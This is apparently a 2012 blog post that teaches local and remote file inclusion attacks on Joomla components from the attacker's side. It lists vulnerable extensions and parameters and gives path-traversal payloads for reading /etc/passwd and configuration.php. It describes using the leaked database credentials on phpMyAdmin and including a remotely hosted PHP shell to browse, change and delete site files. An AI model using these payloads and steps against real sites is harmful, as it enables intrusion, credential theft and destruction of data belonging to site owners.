Friday, February 3, 2012

Joomla RFI Remote File Inclusions Attack | Joomla LFI Local File Inclusions Attack

Joomla LFI Local File Inclusions Attack | Joomla RFI Remote File Inclusions Attack


Examples for Joomla local file inclusions

Local file inclusions are very funny. You tell the website what you want to see. Awesome! You want to view the configuration file which contains the database login credentials? No problem.

You want to view the /etc/passwd file if Joomla is hosted on a Linux box? You can do that.

Local file inclusions are also a common problem in Joomla extensions. Many of them are vulnerable for this type of attack and some of them never get fixed. This may lead to a server hack, which is not funny any more - at least for the system administrator.

A typical URL being vulnerable to LFI looks like this:
index.php?option=com_blablubb&Item=2&view=guestbookpage

Typically most of the vulnerable parameters are this one:
- controller
- view
- layout
- page

To give you some proper understanding of typical affected
URLs I provide you with some examples I found earlier this year:

URL: index.php?option=com_jejob&view=some_value
Vulnerable Parameter: view

URL: index.php?option=com_jeajaxeventcalendar&view=some_value
Vulnerable Parameter: view

URL: index.php?option=com_jradio&controller=some_value
Vulnerable Parameter: controller
((I didn't find this one.))

Now let's see how we can use this:
index.php?option=com_jradio&controller=../../../../etc/passwd

In this case we need to use the famous Nullbyte which helps us to bypass a restriction which is set in the responsible PHP script of the component.

In the example above the controller parameter is used to include a file from the local hard disk. This file contains useful information for us.

If you are not familiar with local file inclusions I recommend you look a tutorial up since I will not explain any details here.

Now with the knowledge about a LFI vulnerability within a Joomla component, we can try to access the configuration.php of Joomla. This file contains very very interesting information.

Since many LFIs also reveal PHP source code, we try this one:
index.php?option=com_blabla&view=../../../configuration.php

The source code of the file is shown and we receive the login data for the current database user. Now find a PHPMyAdmin login on the same server and try to login with this data.

You now have access to all Joomla tables and can basically do what you want.

Examples for Joomla remote file inclusions

Some Joomla components are also known for containing remote file inclusion vulnerabilities. RFIs allow us to include files from another server and to execure code on the target.

A typical RFI URL looks like a LFI URL. In order to give you a better feeling of how to see a RFI vulner-ability within seconds, I show you some examples

URL: index.php?option=com_sef&Itemid=&mosConfig.absolute.path=.
Vulnerable Parameter: &mosConfig.absolute.path

URL: index.php?option=com_jomestate&task=.
Vulnerable Parameter: task

When you found a RFI vulnerability, try to include your PHP shell which is hosted on another box. Once you uploaded it, you are able to browse all Joomla files and download them, change them, remove them...

No Joomla installation is safe when there is an exploited RFI.

No comments:

Post a Comment